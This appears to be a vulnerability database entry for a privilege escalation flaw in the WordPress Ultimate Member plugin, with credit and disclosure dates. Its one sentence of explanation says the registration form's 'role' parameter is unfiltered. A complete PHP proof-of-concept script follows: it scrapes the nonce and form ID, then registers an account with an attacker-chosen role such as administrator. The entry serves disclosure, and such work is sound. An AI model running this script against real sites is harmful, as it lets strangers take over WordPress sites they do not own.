Due to the lack of filtering on the role parameter that could be supplied during the registration process, an attacker could supply the role parameter with a WordPress capability or any custom Ultimate Member role and effectively be granted those privileges.
<?php // Settings $wp_url = $argv[1]; $username = $argv[2]; $name = $argv[3]; $lastname = $argv[4]; $email = $argv[5]; $um_role = $argv[6]; // Pull the Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/register'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); preg_match('/_wpnonce"\svalue="([^"]+)"/', $content, $matches); $nonce = $matches[1]; // Pull the form_id $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/register'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); preg_match('/id=\"form_id_([^"]+)"/', $content, $matches); $form_id = $matches[1]; // Update Settings $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/register'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'user_login-' . $form_id => $username, 'first_name-'. $form_id => $name, 'last_name-' . $form_id => $lastname, 'user_email-' . $form_id => $email, 'user_password-' . $form_id => 'StrongPassword123!', 'confirm_user_password-' . $form_id => 'StrongPassword123!', 'role' => $um_role, 'form_id' => $form_id, 'timestamp' => '1603399250', 'um_request' => '', '_wpnonce' => $nonce, '_wp_http_referer' => 'register' ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>
Chloe Chamberland
Chloe Chamberland
No
2020-11-09 (about 2 years ago)
2020-11-09 (about 2 years ago)
2021-01-09 (about 2 years ago)